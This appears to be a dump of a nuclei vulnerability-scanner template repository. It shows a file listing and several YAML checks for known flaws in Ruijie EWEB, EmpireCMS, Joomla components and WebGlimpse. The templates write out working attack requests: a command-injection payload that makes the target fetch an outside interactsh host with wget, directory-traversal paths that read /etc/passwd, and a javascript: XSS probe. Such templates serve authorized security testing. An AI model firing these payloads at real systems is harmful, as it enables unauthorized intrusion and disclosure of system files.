├── 74cms-workflow.yaml ├── CNVD-2019-19299.yaml ├── CNVD-2019-32204.yaml ├── CNVD-2021-01931.yaml ├── CNVD-2021-09650.yaml ├── CNVD-2021-14536.yaml ├── CNVD-2021-15824.yaml ├── CNVD-2021-26422.yaml ├── CNVD-2021-28277.yaml ├── CNVD-2022-03672.yaml ├── CVE-2007-4504.yaml ├── CVE-2008-4668.yaml ├── CVE-2008-4764.yaml ├── CVE-2008-6080.yaml ├── CVE-2008-6172.yaml ├── CVE-2008-6222.yaml ├── CVE-2009-1496.yaml ├── CVE-2009-1558.yaml ├── CVE-2009-2015.yaml ├── CVE-2009-2100.yaml ├── CVE-2009-3053.yaml ├── CVE-2009-3318.yaml ├── CVE-2009-4202.yaml ├── CVE-2009-4679.yaml ├── CVE-2009-5114.yaml ├── CVE-2010-0157.yaml ├── CVE-2010-0467.yaml ├── CVE-2010-0696.yaml ├── CVE-2010-0759.yaml ├── CVE-2010-0942.yaml ├── CVE-2010-0943.yaml ├── CVE-2010-0944.yaml ├── CVE-2010-0972.yaml ├── CVE-2010-0982.yaml ├── CVE-2010-0985.yaml ├── CVE-2010-1056.yaml ├── CVE-2010-1081.yaml ├── CVE-2010-1217.yaml ├── CVE-2010-1219.yaml ├── CVE-2010-1302.yaml ├── CVE-2010-1304.yaml ├── CVE-2010-1305.yaml ├── CVE-2010-1306.yaml ├── CVE-2010-1307.yaml ├── CVE-2010-1308.yaml ├── CVE-2010-1312.yaml ├── CVE-2010-1313.yaml ├── CVE-2010-1314.yaml ├── CVE-2010-1315.yaml ├── CVE-2010-1340.yaml ├── CVE-2010-1345.yaml ├── CVE-2010-1352.yaml ├── CVE-2010-1353.yaml ├── CVE-2010-1354.yaml ├── CVE-2010-1461.yaml ├── CVE-2010-1469.yaml ├── CVE-2010-1470.yaml ├── CVE-2010-1471.yaml ├── CVE-2010-1472.yaml ├── CVE-2010-1473.yaml ├── CVE-2010-1474.yaml ├── CVE-2010-1475.yaml ├── CVE-2010-1476.yaml ├── CVE-2010-1478.yaml ├── CVE-2010-1491.yaml ├── CVE-2010-1494.yaml ├── CVE-2010-1495.yaml ├── CVE-2010-1531.yaml ├── CVE-2010-1532.yaml ├── CVE-2010-1533.yaml ├── CVE-2010-1534.yaml ├── CVE-2010-1535.yaml ├── CVE-2010-1540.yaml ├── CVE-2010-1601.yaml ├── CVE-2010-1602.yaml ├── CVE-2010-1603.yaml ├── CVE-2010-1607.yaml ├── CVE-2010-1653.yaml ├── CVE-2010-1657.yaml ├── CVE-2010-1658.yaml ├── CVE-2010-1659.yaml ├── CVE-2010-1714.yaml ├── CVE-2010-1715.yaml ├── CVE-2010-1717.yaml ├── CVE-2010-1718.yaml ├── CVE-2010-1719.yaml ├── CVE-2010-1722.yaml ├── CVE-2010-1723.yaml ├── CVE-2010-1858.yaml ├── CVE-2010-1873.yaml ├── CVE-2010-1875.yaml ├── CVE-2010-1878.yaml ├── CVE-2010-1952.yaml ├── CVE-2010-1953.yaml ├── CVE-2010-1954.yaml ├── CVE-2010-1955.yaml ├── CVE-2010-1956.yaml ├── CVE-2010-1957.yaml ├── CVE-2010-1977.yaml ├── CVE-2010-1979.yaml ├── CVE-2010-1980.yaml ├── CVE-2010-1981.yaml ├── CVE-2010-1982.yaml ├── CVE-2010-1983.yaml ├── CVE-2010-2033.yaml ├── CVE-2010-2034.yaml ├── CVE-2010-2035.yaml ├── CVE-2010-2036.yaml ├── CVE-2010-2037.yaml ├── CVE-2010-2045.yaml ├── CVE-2010-2050.yaml ├── CVE-2010-2122.yaml ├── CVE-2010-2128.yaml ├── CVE-2010-2259.yaml ├── CVE-2010-2307.yaml ├── CVE-2010-2507.yaml ├── CVE-2010-2680.yaml ├── CVE-2010-2682.yaml ├── CVE-2010-2857.yaml ├── CVE-2010-2918.yaml ├── CVE-2010-2920.yaml ├── CVE-2010-3203.yaml ├── CVE-2010-3426.yaml ├── CVE-2010-4231.yaml ├── CVE-2010-4282.yaml ├── CVE-2010-4617.yaml ├── CVE-2010-4719.yaml ├── CVE-2010-4769.yaml ├── CVE-2010-4977.yaml ├── CVE-2010-5028.yaml ├── CVE-2010-5278.yaml ├── CVE-2010-5286.yaml ├── CVE-2011-1669.yaml ├── CVE-2011-2744.yaml ├── CVE-2011-2780.yaml ├── CVE-2011-3315.yaml ├── CVE-2011-4618.yaml ├── CVE-2011-4624.yaml ├── CVE-2011-4804.yaml ├── CVE-2011-4926.yaml ├── CVE-2011-5106.yaml ├── CVE-2011-5107.yaml ├── CVE-2011-5179.yaml ├── CVE-2011-5181.yaml ├── CVE-2011-5265.yaml ├── CVE-2012-0896.yaml ├── CVE-2012-0901.yaml ├── CVE-2012-0981.yaml ├── CVE-2012-0991.yaml ├── CVE-2012-0996.yaml ├── CVE-2012-1226.yaml ├── CVE-2012-1835.yaml ├── CVE-2012-2371.yaml ├── CVE-2012-4242.yaml ├── CVE-2012-4253.yaml ├── CVE-2012-4273.yaml ├── CVE-2012-4768.yaml ├── CVE-2012-4878.yaml ├── CVE-2012-4889.yaml ├── CVE-2012-5913.yaml ├── CVE-2013-2287.yaml ├── CVE-2013-3526.yaml ├── CVE-2013-4117.yaml ├── CVE-2013-4625.yaml ├── CVE-2013-5528.yaml ├── CVE-2013-5979.yaml ├── CVE-2013-7240.yaml ├── CVE-2014-10037.yaml ├── CVE-2014-2908.yaml ├── CVE-2014-2962.yaml ├── CVE-2014-4513.yaml ├── CVE-2014-4535.yaml ├── CVE-2014-4536.yaml ├── CVE-2014-4539.yaml ├── CVE-2014-4544.yaml ├── CVE-2014-4550.yaml ├── CVE-2014-4558.yaml ├── CVE-2014-4561.yaml ├── CVE-2014-4592.yaml ├── CVE-2014-4940.yaml ├── CVE-2014-5111.yaml ├── CVE-2014-5258.yaml ├── CVE-2014-5368.yaml ├── CVE-2014-6308.yaml ├── CVE-2014-8682.yaml ├── CVE-2014-8799.yaml ├── CVE-2014-9094.yaml ├── CVE-2014-9444.yaml ├── CVE-2014-9606.yaml ├── CVE-2014-9607.yaml ├── CVE-2014-9608.yaml ├── CVE-2014-9609.yaml ├── CVE-2014-9614.yaml ├── CVE-2014-9615.yaml ├── CVE-2014-9617.yaml ├── CVE-2014-9618.yaml ├── CVE-2015-0554.yaml ├── CVE-2015-1000012.yaml ├── CVE-2015-2067.yaml ├── CVE-2015-2068.yaml ├── CVE-2015-2166.yaml ├── CVE-2015-2807.yaml ├── CVE-2015-4414.yaml ├── CVE-2015-4632.yaml ├── CVE-2015-6920.yaml ├── CVE-2015-7377.yaml ├── CVE-2015-7780.yaml ├── CVE-2015-9414.yaml ├── CVE-2015-9480.yaml ├── CVE-2016-1000126.yaml ├── CVE-2016-1000127.yaml ├── CVE-2016-1000128.yaml ├── CVE-2016-1000129.yaml ├── CVE-2016-1000130.yaml ├── CVE-2016-1000131.yaml ├── CVE-2016-1000132.yaml ├── CVE-2016-1000133.yaml ├── CVE-2016-1000134.yaml ├── CVE-2016-1000135.yaml ├── CVE-2016-1000136.yaml ├── CVE-2016-1000137.yaml ├── CVE-2016-1000138.yaml ├── CVE-2016-1000139.yaml ├── CVE-2016-1000140.yaml ├── CVE-2016-1000141.yaml ├── CVE-2016-1000142.yaml ├── CVE-2016-1000143.yaml ├── CVE-2016-1000146.yaml ├── CVE-2016-1000148.yaml ├── CVE-2016-1000149.yaml ├── CVE-2016-1000152.yaml ├── CVE-2016-1000153.yaml ├── CVE-2016-1000154.yaml ├── CVE-2016-1000155.yaml ├── CVE-2016-10940.yaml ├── CVE-2016-10956.yaml ├── CVE-2016-10960.yaml ├── CVE-2016-10993.yaml ├── CVE-2016-2389.yaml ├── CVE-2017-1000028.yaml ├── CVE-2017-15647.yaml ├── CVE-2017-17043.yaml ├── CVE-2017-17059.yaml ├── CVE-2017-17451.yaml ├── CVE-2017-18536.yaml ├── CVE-2017-5487.yaml ├── CVE-2017-9288.yaml ├── CVE-2018-1000129.yaml ├── CVE-2018-10822.yaml ├── CVE-2018-11709.yaml ├── CVE-2018-12031.yaml ├── CVE-2018-15473.yaml ├── CVE-2018-15535.yaml ├── CVE-2018-16059.yaml ├── CVE-2018-16288.yaml ├── CVE-2018-17422.yaml ├── CVE-2018-19458.yaml ├── CVE-2018-20462.yaml ├── CVE-2018-20470.yaml ├── CVE-2018-20985.yaml ├── CVE-2018-5316.yaml ├── CVE-2018-6008.yaml ├── CVE-2018-6200.yaml ├── CVE-2018-9205.yaml ├── CVE-2019-12276.yaml ├── CVE-2019-13396.yaml ├── CVE-2019-14312.yaml ├── CVE-2019-14470.yaml ├── CVE-2019-15713.yaml ├── CVE-2019-15889.yaml ├── CVE-2019-16332.yaml ├── CVE-2019-16525.yaml ├── CVE-2019-19134.yaml ├── CVE-2019-20085.yaml ├── CVE-2019-9618.yaml ├── CVE-2020-11455.yaml ├── CVE-2020-12054.yaml ├── CVE-2020-17362.yaml ├── CVE-2020-29227.yaml ├── CVE-2020-29395.yaml ├── CVE-2020-35580.yaml ├── CVE-2020-35598.yaml ├── CVE-2021-23241.yaml ├── CVE-2021-24235.yaml ├── CVE-2021-24298.yaml ├── CVE-2021-24320.yaml ├── CVE-2021-24335.yaml ├── CVE-2021-24389.yaml ├── CVE-2021-24499.yaml ├── CVE-2021-27330.yaml ├── CVE-2021-29625.yaml ├── CVE-2021-30049.yaml ├── CVE-2021-33807.yaml ├── CVE-2021-38647.yaml ├── CVE-2021-39316.yaml ├── CVE-2021-40539.yaml ├── CVE-2021-40868.yaml ├── CVE-2021-40960.yaml ├── CVE-2021-41648.yaml ├── CVE-2021-41649.yaml ├── CVE-2021-41773.yaml ├── CVE-2021-44228.yaml ├── CVE-2022-23808.yaml ├── README.md ├── acrolinx-workflow.yaml ├── activemq-workflow.yaml ├── admin-word-count-column-lfi.yaml ├── adminer-workflow.yaml ├── ambari-workflow.yaml ├── amministrazione-aperta-lfi.yaml ├── apereo-cas-workflow.yaml ├── api-1forge.yaml ├── api-abstractapi.yaml ├── api-abuseipdb.yaml ├── api-adoptapet.yaml ├── api-alchemy.yaml ├── api-alienvault.yaml ├── api-amdoren.yaml ├── api-aniapi.yaml ├── api-bhagavadgita.yaml ├── api-bible.yaml ├── api-binance.yaml ├── api-bitcoinaverage.yaml ├── api-bitquery.yaml ├── api-bitrise.yaml ├── api-block.yaml ├── api-blockchain.yaml ├── api-blockfrost.yaml ├── api-box.yaml ├── api-bravenewcoin.yaml ├── api-calendarific.yaml ├── api-charity.yaml ├── api-clearbit.yaml ├── api-coinapi.yaml ├── api-coinlayer.yaml ├── api-coinmarketcap.yaml ├── api-coinranking.yaml ├── api-cooperhewitt.yaml ├── api-covalent.yaml ├── api-ddownload.yaml ├── api-dribbble.yaml ├── api-ebird.yaml ├── api-etherscan.yaml ├── api-europeana.yaml ├── api-festivo.yaml ├── api-gofile.yaml ├── api-harvardart.yaml ├── api-hirak-rates.yaml ├── api-holidayapi.yaml ├── api-iconfinder.yaml ├── api-improvmx.yaml ├── api-instatus.yaml ├── api-iucn.yaml ├── api-mailboxvalidator.yaml ├── api-malshare.yaml ├── api-malwarebazaar.yaml ├── api-micro-user-service.yaml ├── api-mojoauth.yaml ├── api-myanimelist.yaml ├── api-mywot.yaml ├── api-nownodes.yaml ├── api-orbintelligence.yaml ├── api-pastebin.yaml ├── api-petfinder.yaml ├── api-pinata.yaml ├── api-quip.yaml ├── api-rijksmuseum.yaml ├── api-scanii.yaml ├── api-smartsheet.yaml ├── api-stytch.yaml ├── api-thecatapi.yaml ├── api-thedogapi.yaml ├── api-trello.yaml ├── api-urlscan.yaml ├── api-virustotal.yaml ├── api-web3storage.yaml ├── api-wordcloud.yaml ├── apisix-workflow.yaml ├── argocd-login.yaml ├── artifactory-workflow.yaml ├── avantfax-panel.yaml ├── avantfax-workflow.yaml ├── aviatrix-panel.yaml ├── aviatrix-workflow.yaml ├── axigen-workflow.yaml ├── b2evolution-workflow.yaml ├── bedita-panel.yaml ├── bitrix-workflow.yaml ├── bolt-cms-panel.yaml ├── bookstack-panel.yaml ├── bullwark-workflow.yaml ├── cacti-panel.yaml ├── centos-workflow.yaml ├── centreon-panel.yaml ├── chamilo-workflow.yaml ├── checkpoint-workflow.yaml ├── cherokee-workflow.yaml ├── circarlife-workflow.yaml ├── cisco-meraki-workflow.yaml ├── cocoon-workflow.yaml ├── coldfusion-workflow.yaml ├── dahua-workflow.yaml ├── daybyday-panel.yaml ├── dedecms-workflow.yaml ├── dolibarr-panel.yaml ├── dolibarr-workflow.yaml ├── dotclear-panel.yaml ├── dotnetnuke-workflow.yaml ├── druid-panel.yaml ├── drupal-workflow.yaml ├── duomicms-workflow.yaml ├── emby-workflow.yaml ├── ems-webclient-panel.yaml ├── episerver-workflow.yaml ├── error-logs.yaml ├── exposed-bitkeeper.yaml ├── exposed-bzr.yaml ├── exposed-darcs.yaml ├── exposed-hg.yaml ├── feifeicms-workflow.yaml ├── finereport-workflow.yaml ├── fortinet-panel.yaml ├── fortinet-workflow.yaml ├── gateone-workflow.yaml ├── geowebserver-workflow.yaml ├── gespage-panel.yaml ├── gespage-workflow.yaml ├── gitlist-workflow.yaml ├── glpi-panel.yaml ├── glpi-workflow.yaml ├── gogs-workflow.yaml ├── google-books.yaml ├── graphite-workflow.yaml ├── grav-workflow.yaml ├── gsoap-workflow.yaml ├── guacamole-workflow.yaml ├── h3c-imc-workflow.yaml ├── home-assistant-detect.yaml ├── igs-workflow.yaml ├── itop-workflow.yaml ├── jaspersoft-panel.yaml ├── jboss-detect.yaml ├── jboss-workflow.yaml ├── jeedom-panel.yaml ├── jeedom-workflow.yaml ├── jenkins-detect.yaml ├── jetty-workflow.yaml ├── joomla-jvehicles-lfi.yaml ├── joomla-workflow.yaml ├── kentico-workflow.yaml ├── keycloak-workflow.yaml ├── kibana-panel.yaml ├── kibana-workflow.yaml ├── kindeditor-workflow.yaml ├── kong-workflow.yaml ├── lanproxy-workflow.yaml ├── lansweeper-workflow.yaml ├── laravel-workflow.yaml ├── magmi-workflow.yaml ├── maian-workflow.yaml ├── manageengine-opmanager.yaml ├── mantisbt-workflow.yaml ├── mautic-crm-panel.yaml ├── mautic-workflow.yaml ├── metabase-panel.yaml ├── metabase-workflow.yaml ├── metinfo-workflow.yaml ├── microsoft-exchange-workflow.yaml ├── microstrategy-workflow.yaml ├── mobileiron-workflow.yaml ├── moodle-workflow.yaml ├── netsweeper-open-redirect.yaml ├── netsweeper-rxss.yaml ├── netsweeper-workflow.yaml ├── nette-workflow.yaml ├── nginx-version.yaml ├── ninjaform-open-redirect.yaml ├── node-red-workflow.yaml ├── novnc-workflow.yaml ├── ofbiz-workflow.yaml ├── oneblog-detect.yaml ├── openam-workflow.yaml ├── opencast-detect.yaml ├── openemr-workflow.yaml ├── opensis-workflow.yaml ├── opensns-workflow.yaml ├── oscommerce-workflow.yaml ├── pandora-workflow.yaml ├── pega-workflow.yaml ├── pentaho-workflow.yaml ├── phpcollab-workflow.yaml ├── phpinfo.yaml ├── phppgadmin-workflow.yaml ├── phpwiki-workflow.yaml ├── powercreator-workflow.yaml ├── processmaker-workflow.yaml ├── prometheus-workflow.yaml ├── prtg-workflow.yaml ├── pulsesecure-workflow.yaml ├── qcubed-workflow.yaml ├── r-seenet-workflow.yaml ├── rancher-workflow.yaml ├── rconfig-workflow.yaml ├── remkon-manager-panel.yaml ├── ricoh-workflow.yaml ├── rosariosis-workflow.yaml ├── rstudio-workflow.yaml ├── sage-panel.yaml ├── saltstack-workflow.yaml ├── sarg-workflow.yaml ├── sco-workflow.yaml ├── seeddms-panel.yaml ├── sequoiadb-workflow.yaml ├── sharepoint-workflow.yaml ├── shopxo-workflow.yaml ├── sidekiq-workflow.yaml ├── skywalking-workflow.yaml ├── solr-workflow.yaml ├── sonarqube-workflow.yaml ├── sourcebans-workflow.yaml ├── splunk-workflow.yaml ├── square-access-token.yaml ├── squirrelmail-workflow.yaml ├── strapi-cms-detect.yaml ├── subrion-workflow.yaml ├── sugarcrm-workflow.yaml ├── symfony-workflow.yaml ├── tapestry-workflow.yaml ├── terramaster-workflow.yaml ├── thinfinity-workflow.yaml ├── thinkadmin-workflow.yaml ├── thinkcmf-detect.yaml ├── thruk-workflow.yaml ├── tikiwiki-workflow.yaml ├── tongda-workflow.yaml ├── tpshop-workflow.yaml ├── traefik-workflow.yaml ├── twitter-secret.yaml ├── umbraco-workflow.yaml ├── vmware-workflow.yaml ├── voipmonitor-workflow.yaml ├── wazuh-panel.yaml ├── webmin-workflow.yaml ├── webmodule-ee-panel.yaml ├── websvn-workflow.yaml ├── wordpress-accessible-wpconfig.yaml ├── wp-ambience-xss.yaml ├── wp-church-admin-xss.yaml ├── wp-custom-tables-xss.yaml ├── wp-finder-xss.yaml ├── wp-flagem-xss.yaml ├── wp-knews-xss.yaml ├── wp-nextgen-xss.yaml ├── wp-phpfreechat-xss.yaml ├── wp-securimage-xss.yaml ├── wp-slideshow-xss.yaml ├── wp-socialfit-xss.yaml ├── wuzhicms-workflow.yaml ├── xdcms-workflow.yaml ├── xiuno-workflow.yaml ├── xxljob-panel.yaml ├── xxljob-workflow.yaml ├── yapi-workflow.yaml ├── yii-workflow.yaml ├── yzmcms-panel.yaml ├── zabbix-workflow.yaml ├── zcms-workflow.yaml ├── zeroshell-workflow.yaml ├── zimbra-workflow.yaml └── zzzcms-workflow.yaml /74cms-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: 74cms-workflow 2 | 3 | info: 4 | name: 74cms Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all 74cms related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: 74cms 12 | subtemplates: 13 | - tags: 74cms -------------------------------------------------------------------------------- /CNVD-2021-09650.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2021-09650 2 | 3 | info: 4 | name: Ruijie EWEB Gateway Platform - Remote Command Injection 5 | author: daffainfo 6 | severity: critical 7 | description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. 8 | reference: 9 | - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ 10 | classification: 11 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 12 | cvss-score: 10.0 13 | cwe-id: CWE-77 14 | tags: ruijie,cnvd,cnvd2021,rce 15 | 16 | requests: 17 | - raw: 18 | - | 19 | POST /guest_auth/guestIsUp.php 20 | Host: {{Hostname}} 21 | 22 | mac=1&ip=127.0.0.1|wget {{interactsh-url}} 23 | 24 | unsafe: true 25 | matchers: 26 | - type: word 27 | part: interactsh_protocol 28 | name: http 29 | words: 30 | - "http" 31 | 32 | # Enhanced by mp on 2022/05/12 33 | -------------------------------------------------------------------------------- /CNVD-2021-15824.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2021-15824 2 | 3 | info: 4 | name: EmpireCMS DOM Cross Site-Scripting 5 | author: daffainfo 6 | severity: high 7 | description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack. 8 | reference: 9 | - https://sourceforge.net/projects/empirecms/ 10 | - https://www.bilibili.com/read/cv10441910 11 | - https://vul.wangan.com/a/CNVD-2021-15824 12 | classification: 13 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N 14 | cvss-score: 7.2 15 | cwe-id: CWE-79 16 | tags: empirecms,cnvd,cnvd2021,xss,domxss 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)" 22 | 23 | matchers-condition: and 24 | matchers: 25 | - type: word 26 | part: body 27 | words: 28 | - 'if(Request("url")!=0)' 29 | - 'href=\""+Request("url")+"\"' 30 | condition: and 31 | 32 | - type: status 33 | status: 34 | - 200 35 | 36 | # Enhanced by mp on 2022/03/23 37 | -------------------------------------------------------------------------------- /CVE-2007-4504.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2007-4504 2 | 3 | info: 4 | name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval 5 | author: daffainfo 6 | severity: high 7 | description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. 8 | reference: 9 | - https://www.exploit-db.com/exploits/4307 10 | - https://www.cvedetails.com/cve/CVE-2007-4504 11 | - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 12 | classification: 13 | cve-id: CVE-2007-4504 14 | tags: cve,cve2007,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd" 20 | 21 | matchers-condition: and 22 | matchers: 23 | 24 | - type: regex 25 | regex: 26 | - "root:.*:0:0:" 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /CVE-2008-4668.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2008-4668 2 | 3 | info: 4 | name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/6618 10 | - https://www.cvedetails.com/cve/CVE-2008-4668 11 | - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ 12 | - http://securityreason.com/securityalert/4464 13 | classification: 14 | cve-id: CVE-2008-4668 15 | tags: cve,cve2008,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2008-6080.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2008-6080 2 | 3 | info: 4 | name: Joomla! Component ionFiles 4.4.2 - File Disclosure 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. 8 | reference: 9 | - https://www.exploit-db.com/exploits/6809 10 | - https://www.cvedetails.com/cve/CVE-2008-6080 11 | - http://secunia.com/advisories/32377 12 | - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/ 13 | classification: 14 | cve-id: CVE-2008-6080 15 | tags: cve,cve2008,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2008-6222.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2008-6222 2 | 3 | info: 4 | name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/6980 10 | - https://www.cvedetails.com/cve/CVE-2008-6222 11 | - http://secunia.com/advisories/32523 12 | - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/ 13 | classification: 14 | cve-id: CVE-2008-6222 15 | tags: cve,cve2008,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2009-1496.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-1496 2 | 3 | info: 4 | name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/8367 10 | - https://www.cvedetails.com/cve/CVE-2009-1496 11 | - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ 12 | - http://www.securityfocus.com/bid/34431 13 | classification: 14 | cve-id: CVE-2009-1496 15 | tags: cve,cve2009,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2009-2015.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-2015 2 | 3 | info: 4 | name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. 8 | reference: 9 | - https://www.exploit-db.com/exploits/8898 10 | - https://www.cvedetails.com/cve/CVE-2009-2015 11 | - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/ 12 | - http://www.vupen.com/english/advisories/2009/1530 13 | classification: 14 | cve-id: CVE-2009-2015 15 | tags: cve,cve2009,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2009-2100.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-2100 2 | 3 | info: 4 | name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/8946 10 | - https://www.cvedetails.com/cve/CVE-2009-2100 11 | - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ 12 | - http://www.securityfocus.com/bid/35378 13 | classification: 14 | cve-id: CVE-2009-2100 15 | tags: cve,cve2009,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2009-5114.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-5114 2 | 3 | info: 4 | name: WebGlimpse 2.18.7 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. 8 | reference: 9 | - https://www.exploit-db.com/exploits/36994 10 | - https://www.cvedetails.com/cve/CVE-2009-5114 11 | - http://websecurity.com.ua/2628/ 12 | - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321 13 | remediation: Apply all relevant security patches and product upgrades. 14 | classification: 15 | cve-id: CVE-2009-5114 16 | tags: cve,cve2009,lfi 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" 22 | matchers-condition: and 23 | matchers: 24 | - type: regex 25 | regex: 26 | - "root:.*:0:0:" 27 | - type: status 28 | status: 29 | - 200 30 | # Enhanced by mp on 2022/02/13 31 | -------------------------------------------------------------------------------- /CVE-2010-0972.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-0972 2 | 3 | info: 4 | name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/11738 10 | - https://www.cvedetails.com/cve/CVE-2010-0972 11 | - http://secunia.com/advisories/38925 12 | remediation: Apply all relevant security patches and product upgrades. 13 | classification: 14 | cve-id: CVE-2010-0972 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 